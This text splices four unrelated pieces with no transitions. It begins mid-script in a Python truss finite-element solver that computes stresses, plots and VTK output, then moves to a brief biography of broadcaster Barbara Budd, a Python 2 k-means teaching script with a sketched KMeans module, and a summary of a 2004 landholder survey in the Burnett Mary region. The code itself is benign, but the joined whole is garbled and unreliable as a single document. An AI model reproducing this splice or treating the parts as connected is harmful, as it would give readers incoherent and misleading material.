        nodes[i]['xforce'] = nodes[i]['xbcval']
    if(nodes[i]['xflag'] == 'd'):
        nodes[i]['xdisp'] = nodes[i]['xbcval']
        nodes[i]['xforce'] = x[3*i+0][0]
    if(nodes[i]['yflag'] == 'f'):
        nodes[i]['ydisp'] = x[3*i+1][0]
        nodes[i]['yforce'] = nodes[i]['ybcval']
    if(nodes[i]['yflag'] == 'd'):
        nodes[i]['ydisp'] = nodes[i]['ybcval']
        nodes[i]['yforce'] = x[3*i+1][0]
    if(nodes[i]['zflag'] == 'f'):
        nodes[i]['zdisp'] = x[3*i+2][0]
        nodes[i]['zforce'] = nodes[i]['zbcval']
    if(nodes[i]['zflag'] == 'd'):
        nodes[i]['zdisp'] = nodes[i]['zbcval']
        nodes[i]['zforce'] = x[3*i+2][0]
    nodes[i]['xnew'] = nodes[i]['x'] + nodes[i]['xdisp']
    nodes[i]['ynew'] = nodes[i]['y'] + nodes[i]['ydisp']
    nodes[i]['znew'] = nodes[i]['z'] + nodes[i]['zdisp']
# Calculate member results
for i in range(nmem):
    dx = nodes[members[i]['end']]['xnew'] - nodes[members[i]['start']]['xnew']
    dy = nodes[members[i]['end']]['ynew'] - nodes[members[i]['start']]['ynew']
    dz = nodes[members[i]['end']]['znew'] - nodes[members[i]['start']]['znew']
    members[i]['Lnew'] = numpy.sqrt(dx*dx + dy*dy + dz*dz)
    members[i]['epsilon'] = (members[i]['Lnew'] - members[i]['L'])/members[i]['L']
    members[i]['stress'] = members[i]['epsilon']*members[i]['E']
    members[i]['load'] = members[i]['stress']*members[i]['A']
# Calculate null space of A (http://stackoverflow.com/questions/2992947/calculating-the-null-space-of-a-matrix)
u, s, vh = numpy.linalg.svd(A)
null_mask = (s <= 1.0e-15)
null_space = scipy.compress(null_mask, vh, axis=0)
nullspace = scipy.transpose(null_space)
# ========================
#
# OUTPUT RESULTS TO TERMINAL
#
print(' ')
print('==============================================')
print(' ')
print(' RESULTS')
print(' ')
print('==============================================')
print(' ')
print('Pin Displacements (x,y,z)')
print('--------------------------------------')
for i in range(nnodes):
    print('Node % 3d: % 10.5e % 10.5e % 10.5e' % (i, nodes[i]['xdisp'], nodes[i]['ydisp'], nodes[i]['zdisp']))
print(' ')
print(' ')
print('Member Results')
print('--------------------------------------')
for i in range(nmem):
    print('Member % 3d:' % (i))
    print(' Internal Load: % 10.5e' % (members[i]['load']))
    print(' Axial Strain: % 10.5e' % (members[i]['epsilon']))
    print(' Axial Stress: % 10.5e' % (members[i]['stress']))
    if(members[i]['stress'] > members[i]['sigma_yield']):
        if(members[i]['stress'] < members[i]['sigma_ult']):
            print(' --> YIELD STRESS SURPASSED')
        if(members[i]['stress'] > members[i]['sigma_ult']):
            print(' --> ULTIMATE STRESS SURPASSED')
    print(' ')
print(' ')
print(' ')
print(' ')
print('==============================================')
print(' ')
print(' SOLUTION QUALITY INDICATORS')
print(' ')
print('==============================================')
print(' ')
print('Rank of A matrix: %d' % (rank))
print(' ')
print('Size of A: %d' % (3*nnodes))
print(' ')
print('Condition Number: % 10.3e (smaller is better)' % (singularvals.max()/singularvals.min()))
print(' General rule: If condition number is O(10^n), discard last n digits')
print(' from the results.')
print(' ')
print('Singular values: ')
for i in range(len(singularvals)):
    print(' % 12.10g' % (singularvals[i]))
print(' ')
print('Nullspace of A:')
print(nullspace)
# ========================
#
# GENERATE PLOTS
#
xOriginal = numpy.zeros((nnodes))
yOriginal = numpy.zeros((nnodes))
zOriginal = numpy.zeros((nnodes))
xNew = numpy.zeros((nnodes))
yNew = numpy.zeros((nnodes))
zNew = numpy.zeros((nnodes))
for i in range(nnodes):
    xOriginal[i] = nodes[i]['x']
    xNew[i] = xOriginal[i] + nodes[i]['xdisp']*displayScaleFactor
    yOriginal[i] = nodes[i]['y']
    yNew[i] = yOriginal[i] + nodes[i]['ydisp']*displayScaleFactor
    zOriginal[i] = nodes[i]['z']
    zNew[i] = zOriginal[i] + nodes[i]['zdisp']*displayScaleFactor
xmin1 = numpy.min(xOriginal)
xmin2 = numpy.min(xNew)
xmin = min(xmin1,xmin2)
ymin1 = numpy.min(yOriginal)
ymin2 = numpy.min(yNew)
ymin = min(ymin1,ymin2)
zmin1 = numpy.min(zOriginal)
zmin2 = numpy.min(zNew)
zmin = min(zmin1,zmin2)
xmax1 = numpy.max(xOriginal)
xmax2 = numpy.max(xNew)
xmax = max(xmax1, xmax2)
ymax1 = numpy.max(yOriginal)
ymax2 = numpy.max(yNew)
ymax = max(ymax1, ymax2)
zmax1 = numpy.max(zOriginal)
zmax2 = numpy.max(zNew)
zmax = max(zmax1, zmax2)
xRange = xmax - xmin
yRange = ymax - ymin
zRange = zmax - zmin
factor = 0.02
# Generate XY view
plt.figure()
plt.plot(xOriginal, yOriginal, 'ob', label='Original Position')
plt.hold(True)
plt.plot(xNew, yNew, 'or', label='New Position')
for i in range(nmem):
    xx = [xOriginal[members[i]['start']], xOriginal[members[i]['end']]]
    yy = [yOriginal[members[i]['start']], yOriginal[members[i]['end']]]
    plt.plot(xx, yy, '-b')
    xx2 = [xNew[members[i]['start']], xNew[members[i]['end']]]
    yy2 = [yNew[members[i]['start']], yNew[members[i]['end']]]
    if(members[i]['stress'] > members[i]['sigma_yield']):
        if(members[i]['stress'] < members[i]['sigma_ult']):
            plt.plot(xx2, yy2, color="#ffa500")
        if(members[i]['stress'] > members[i]['sigma_ult']):
            plt.plot(xx2, yy2, color="#ff2500")
    else:
        plt.plot(xx2, yy2, color="#006600")
plt.xlim([xmin - xRange*factor, xmax + xRange*factor])
plt.ylim([ymin - yRange*factor, ymax + yRange*factor])
plt.xlabel('X Position')
plt.ylabel('Y Position')
plt.title('Truss - XY View -- Displacements Scaled ' + str(displayScaleFactor) + 'x')
plt.grid(True)
plt.legend()
plt.savefig('Truss_XY_View.png')
# If displacement in the Z-direction exists, plot XZ and YZ views. Note that
# the zRange cannot be compared to precisely '0' due to floating-point errors,
# so it is compared to a very small value instead. Also note that 'x' and 'y'
# refer to the 2D plot and therefore do not necessarily correspond directly
# to the 'x' and 'y' coordinates of the nodes.
if(zRange > 1.0e-5):
    plt.figure()
    plt.plot(xOriginal, zOriginal, 'ob', label='Original Position')
    plt.hold(True)
    plt.plot(xNew, zNew, 'or', label='New Position')
    for i in range(nmem):
        xx = [xOriginal[members[i]['start']], xOriginal[members[i]['end']]]
        yy = [zOriginal[members[i]['start']], zOriginal[members[i]['end']]]
        plt.plot(xx, yy, '-b')
        xx2 = [xNew[members[i]['start']], xNew[members[i]['end']]]
        yy2 = [zNew[members[i]['start']], zNew[members[i]['end']]]
        if(members[i]['stress'] > members[i]['sigma_yield']):
            if(members[i]['stress'] < members[i]['sigma_ult']):
                plt.plot(xx2, yy2, color="#ffa500")
            if(members[i]['stress'] > members[i]['sigma_ult']):
                plt.plot(xx2, yy2, color="#ff2500")
        else:
            plt.plot(xx2, yy2, color="#006600")
    plt.xlim([xmin - xRange*factor, xmax + xRange*factor])
    plt.ylim([zmin - zRange*factor, zmax + zRange*factor])
    plt.xlabel('X Position')
    plt.ylabel('Z Position')
    plt.title('Truss - XZ View -- Displacements Scaled ' + str(displayScaleFactor) + 'x')
    plt.grid(True)
    plt.legend()
    plt.savefig('Truss_XZ_View.png')

    plt.figure()
    plt.plot(yOriginal, zOriginal, 'ob', label='Original Position')
    plt.hold(True)
    plt.plot(yNew, zNew, 'or', label='New Position')
    for i in range(nmem):
        xx = [yOriginal[members[i]['start']], yOriginal[members[i]['end']]]
        yy = [zOriginal[members[i]['start']], zOriginal[members[i]['end']]]
        plt.plot(xx, yy, '-b')
        xx2 = [yNew[members[i]['start']], yNew[members[i]['end']]]
        yy2 = [zNew[members[i]['start']], zNew[members[i]['end']]]
        if(members[i]['stress'] > members[i]['sigma_yield']):
            if(members[i]['stress'] < members[i]['sigma_ult']):
                plt.plot(xx2, yy2, color="#ffa500")
            if(members[i]['stress'] > members[i]['sigma_ult']):
                plt.plot(xx2, yy2, color="#ff2500")
        else:
            plt.plot(xx2, yy2, color="#006600")
    plt.xlim([ymin - yRange*factor, ymax + yRange*factor])
    plt.ylim([zmin - zRange*factor, zmax + zRange*factor])
    plt.xlabel('Y Position')
    plt.ylabel('Z Position')
    plt.title('Truss - YZ View -- Displacements Scaled ' + str(displayScaleFactor) + 'x')
    plt.grid(True)
    plt.legend()
    plt.savefig('Truss_YZ_View.png')
# Write results to VTK files to enable more-flexible visualization via ParaView
# (or any other VTK-supporting viewer)
f = open('TrussOriginal.vtk', 'w')
f.write("# vtk DataFile Version 2.0 \n")
f.write("Truss - Original Configuration \n")
f.write("ASCII \n")
f.write("DATASET UNSTRUCTURED_GRID \n")
f.write("Points " + str(nnodes) + " float \n")
for i in range(nnodes):
    f.write(str(nodes[i]['x']) + " " + str(nodes[i]['y']) + " " + str(nodes[i]['z']) + " \n")
f.write("Cells " + str(nmem) + " " + str(nmem*3) + " \n")
for i in range(nmem):
    f.write("2 " + str(members[i]['start']) + " " + str(members[i]['end']) + " \n")
f.write("Cell_Types " + str(nmem) + " \n")
for i in range(nmem):
    f.write("3 \n")  # All "cells" are of type VTK_LINE
f.close()
f = open('TrussNew.vtk', 'w')
f.write("# vtk DataFile Version 2.0 \n")
f.write("Truss - Deformed Configuration - Deformation scaled by " + str(displayScaleFactor) + "x \n")
f.write("ASCII \n")
f.write("DATASET UNSTRUCTURED_GRID \n")
f.write("Points " + str(nnodes) + " float \n")
for i in range(nnodes):
    f.write(str(xNew[i]) + " " + str(yNew[i]) + " " + str(zNew[i]) + " \n")
f.write("Cells " + str(nmem) + " " + str(nmem*3) + " \n")
for i in range(nmem):
    f.write("2 " + str(members[i]['start']) + " " + str(members[i]['end']) + " \n")
f.write("Cell_Types " + str(nmem) + " \n")
for i in range(nmem):
    f.write("3 \n")  # All "cells" are of type VTK_LINE
f.close()
Barbara Budd is a graduate of York University’s theatre program and began her career on stage, including five seasons and 20 productions at Ontario’s Stratford Festival, before appearing regularly in radio dramas for the CBC. It was this work that ultimately led to her employment as an on-air presenter for the public broadcaster, where she spent 17 years as cohost and voice of CBC Radio’s As It Happens. In May 2011, Budd was honoured by ACTRA (Alliance of Canadian Cinema, Television and Radio Artists) with the coveted John Drainie Award.
import numpy as np
import matplotlib.cm as cm
import KMeans as kmeans
from Point import Point
from Plotter import Plotter
from Centroid import Centroid


def loadData(fileName):
    """
    Returns two data sets.
    The first return value is the x values and the second one is the y values.
    """
    data = np.loadtxt(fileName)
    data = map(list, zip(*data))  # Transpose: (x, y) rows become one list of x values and one of y values.
    return (data[0], data[1])


def getCentroids(clusterPoints):
    centroids = []
    colors = iter(cm.rainbow(np.linspace(0, 1, len(clusterPoints))))
    for index in xrange(0, len(clusterPoints)):
        centroids.append(Centroid(clusterPoints[index], next(colors), index))
    return centroids


if __name__ == '__main__':
    # Init the plotter with some axis parameters.
    plotter = Plotter([-20, 80], [-20, 80])

    # Load data.
    # TODO Try loading the smallDataSet.txt and see what happens.
    # Try not to use the large data sets since the program will be quite slow.
    # If you want a different dataset talk to @Johan.
    trainingX, trainingY = loadData('testData.txt')
    print "Init - show the data..."

    # Just show the data.
    plotter.plotUnlabledData(trainingX, trainingY)
    plotter.show()
    raw_input('Press enter to continue')

    # Define the centroids based on some points.
    print "Init - Create the first cluster points and plot them..."
    # TODO here is where you change the number of centroids by adding or removing points.
    # The numbers represent the starting point of each centroid as an (x, y) coordinate pair.
    clusterPoints = [Point(2, 3), Point(35, 20), Point(40, 40), Point(60, 60), Point(30, 30)]
    centroids = getCentroids(clusterPoints)  # Convert the points to centroids for plotting and labeling assistance.
    plotter.plotCentroids(centroids)
    print "Init complete..."
    raw_input('Press enter to continue and to start the algorithm.')

    # Run the algorithm 10 times.
    # TODO So right now we are running the algorithm a fixed number of times.
    # Maybe we should come up with a better convergence measurement?
    for x in xrange(10):
        # Get labels.
        print "Create the labels, this should take some time..."
        # The interesting part is what is going on in the classify method.
        labels = kmeans.classify(trainingX, trainingY, centroids)

        # Plot the labeled data.
        print "Plot the labeled data."
        plotter.clear()
        plotter.plotCentroids(centroids)
        plotter.plotLabledData(trainingX, trainingY, labels, centroids)
        raw_input('Press enter to continue')

        # Recalculate the centroids and, so to say, unlabel the data.
        print "Plot the new centroids."
        plotter.clear()
        plotter.plotUnlabledData(trainingX, trainingY)
        centroids = kmeans.reCalculateCentroids(trainingX, trainingY, labels, centroids)
        plotter.plotCentroids(centroids)
        raw_input('Press enter to continue')

    raw_input("Trying out the clusters with some new data... press enter to continue")

    # Here we just look at some different data.
    rawDataX, rawDataY = loadData('largeDataSet.txt')
    labels = kmeans.classify(rawDataX, rawDataY, centroids)
    plotter.clear()
    plotter.plotCentroids(centroids)
    plotter.plotLabledData(rawDataX, rawDataY, labels, centroids)
    raw_input('Finished. Press enter to close.')
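For reference, the KMeans module driven above is not part of this excerpt. A minimal sketch of what its two entry points might look like, assuming each Centroid exposes its index as centroid.index and its current position as centroid.point (assumptions, since Centroid.py is not shown):

# KMeans sketch; illustrative only, not the actual KMeans.py used above.
import numpy as np
from Point import Point

def classify(xs, ys, centroids):
    # Label each (x, y) sample with the index of its nearest centroid.
    labels = []
    for x, y in zip(xs, ys):
        dists = [(x - c.point.x) ** 2 + (y - c.point.y) ** 2 for c in centroids]
        labels.append(int(np.argmin(dists)))
    return labels

def reCalculateCentroids(xs, ys, labels, centroids):
    # Move every centroid to the mean of the samples assigned to it.
    for c in centroids:
        members = [(x, y) for x, y, l in zip(xs, ys, labels) if l == c.index]
        if members:
            c.point = Point(np.mean([m[0] for m in members]),
                            np.mean([m[1] for m in members]))
    return centroids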
This report presents a summary of key findings from a survey mailed to 1,000 landholders in the Burnett Mary region in 2004. The final response rate was 60%. The survey gathered baseline information on the key social and economic factors affecting landholder decision-making about adopting practices expected to improve the management of natural resources in the region. Survey findings highlighted that many of the priority issues identified in the draft natural resource management plan for the Burnett Mary region are not considered among the most pressing issues facing rural communities. Three of the top five issues identified by landholders were social issues, including the availability of important services, the lack of long-term opportunities for young people and reduced employment opportunities. While some production and environmental issues, such as the impact of pest plants and animals and the decline in soil health, were considered important by many respondents, others, such as dryland salinity, soil acidity, decline of native vegetation, deteriorating water quality and lack of awareness about Aboriginal cultural heritage sites, were not rated as important by most landholders.